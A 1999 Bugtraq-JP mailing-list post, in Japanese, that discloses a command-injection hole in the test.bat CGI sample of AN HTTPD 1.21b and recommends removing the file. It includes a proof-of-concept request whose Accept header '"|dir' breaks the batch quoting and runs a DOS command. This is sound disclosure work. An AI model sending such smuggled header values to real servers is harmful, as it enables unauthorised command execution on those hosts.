Return-Path: owner-bugtraq-jp@SECURITYFOCUS.COM MIME-Version: 1.0 Content-Type: text/plain; charset="iso-2022-jp" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Message-ID: <007b01bf2c66$9d8e53a0$8e90a4d2@local> Date: Fri, 12 Nov 1999 02:03:00 +0900 Reply-To: D Layer Sender: BUGTRAQ-JP List From: D Layer Subject: AN HTTPD 1.21b - test.bat & malformed accept header X-To: BUGTRAQ-JP@SECURITYFOCUS.COM To: BUGTRAQ-JP@SECURITYFOCUS.COM 初めまして。D Layerです。 AN HTTPD 1.21b(最新版)に付属するcgiサンプルであるtest.batの脆弱性について報告します。 現在、test.bat内の環境変数を出力する部分は > echo HTTP_ACCEPT="%HTTP_ACCEPT%" のよにクォートされ、DOSのメタ文字が無効化されていますが、 HTTPセッションにおいて異常なacceptヘッダを送信することにより クォートを無効化しメタ文字を有効にすることが出来ます。 -- Begin -- GET /cgi-bin/test.bat HTTP/1.0 accept:"|dir" -- End -- 上記のようなリクエストを発行することにより、 > echo HTTP_ACCEPT="%HTTP_ACCEPT%" の部分が > echo HTTP_ACCEPT=""|dir"" のように展開され、結果としてdirコマンドが実行されます。 test.batを削除するなどして、test.batを外部から参照できなくする事で この脆弱性を回避することが出来ます。 -/ D Layer - "L" /- mailto:phyx@i.am -- http://layer.webprovider.com/